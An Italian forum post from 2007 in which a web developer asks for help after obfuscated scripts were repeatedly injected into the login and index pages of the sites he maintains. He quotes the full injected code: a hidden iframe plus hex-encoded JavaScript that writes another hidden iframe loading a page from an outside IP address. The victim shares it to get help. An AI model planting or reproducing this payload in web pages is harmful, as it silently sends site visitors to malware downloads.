Hardware Upgrade Forum - View Single Post

Argosoft · 13-12-2007, 10:58

Raga... aiuto che casino! c'è un problema che mi sta rovinando!

Il fatto: da un paio di giorni, in tutti i siti su cui lavoro, che ho memorizzato in Dreamweaver (sono un web-developer) sono comparsi degli iframe maligni in ogni pagina index.php, index.htm, index.html, home.php, login.php e auth.php (per ora ho visto queste!)
I siti interessati sono tutti quelli che avevo memorizzati: i siti che ho curato per due aziende diverse e i miei personali. Per non sbagliare, ho immediatamente formattato, reinstallato XP, installato Kaspersky, e cambiato tutte le password FTP dei siti bucati. E oggi.......... torna fuori!!!!!!

Com'è possibile!!!!

il codice che viene inserito è questo :

Codice:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4760ad0e3414e(v4760ad0e344b2){ function v4760ad0e348c8 () {return 16;} return(parseInt(v4760ad0e344b2,v4760ad0e348c8()));}function v4760ad0e350bb(v4760ad0e35a86){ function v4760ad0e3645f () {return 2;} var v4760ad0e35e3b='';for(v4760ad0e3606f=0; v4760ad0e3606f<v4760ad0e35a86.length; v4760ad0e3606f+=v4760ad0e3645f()){ v4760ad0e35e3b+=(String.fromCharCode(v4760ad0e3414e(v4760ad0e35a86.substr(v4760ad0e3606f, v4760ad0e3645f()))));}return v4760ad0e35e3b;} document.write(v4760ad0e350bb('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D396464353535207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3338383638292B273835303237656261375C272077696474683D3739206865696768743D343932207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

che tradotto carica un file da un ip 77.*** (è un ip russo). Appena formattato e installato l'antivirus, all'apertura della pagina infetta kaspersky s'incavolava segnalando un trojan iframer / downloader, ora invece non lo fa più! AVG segnalava il frame invece come JS/Psyme, ma a quanto leggo c'entra poco con gli effetti che vedo. Scansioni complete con kaspersky, avg, sophos anti-rootkit non trovano assolutamente NULLA. Non capisco!! può essere un pc infetto della rete che riesce a bucare il mio ? Può essere un problema del server? omg... help!

13-12-2007, 10:58	#1
Argosoft Senior Member Iscritto dal: Aug 2003 Città: addio fabriANO... mò sto a Roma ahò!! Messaggi: 579	[HELP!] virus e iframe Raga... aiuto che casino! c'è un problema che mi sta rovinando! Il fatto: da un paio di giorni, in tutti i siti su cui lavoro, che ho memorizzato in Dreamweaver (sono un web-developer) sono comparsi degli iframe maligni in ogni pagina index.php, index.htm, index.html, home.php, login.php e auth.php (per ora ho visto queste!) I siti interessati sono tutti quelli che avevo memorizzati: i siti che ho curato per due aziende diverse e i miei personali. Per non sbagliare, ho immediatamente formattato, reinstallato XP, installato Kaspersky, e cambiato tutte le password FTP dei siti bucati. E oggi.......... torna fuori!!!!!! Com'è possibile!!!! il codice che viene inserito è questo : Codice: <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4760ad0e3414e(v4760ad0e344b2){ function v4760ad0e348c8 () {return 16;} return(parseInt(v4760ad0e344b2,v4760ad0e348c8()));}function v4760ad0e350bb(v4760ad0e35a86){ function v4760ad0e3645f () {return 2;} var v4760ad0e35e3b='';for(v4760ad0e3606f=0; v4760ad0e3606f<v4760ad0e35a86.length; v4760ad0e3606f+=v4760ad0e3645f()){ v4760ad0e35e3b+=(String.fromCharCode(v4760ad0e3414e(v4760ad0e35a86.substr(v4760ad0e3606f, v4760ad0e3645f()))));}return v4760ad0e35e3b;} document.write(v4760ad0e350bb('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D396464353535207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3338383638292B273835303237656261375C272077696474683D3739206865696768743D343932207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> che tradotto carica un file da un ip 77.*** (è un ip russo). Appena formattato e installato l'antivirus, all'apertura della pagina infetta kaspersky s'incavolava segnalando un trojan iframer / downloader, ora invece non lo fa più! AVG segnalava il frame invece come JS/Psyme, ma a quanto leggo c'entra poco con gli effetti che vedo. Scansioni complete con kaspersky, avg, sophos anti-rootkit non trovano assolutamente NULLA. Non capisco!! può essere un pc infetto della rete che riesce a bucare il mio ? Può essere un problema del server? omg... help! __________________ Tavshan Pasha Bazar: Oggetti etnici per il relax!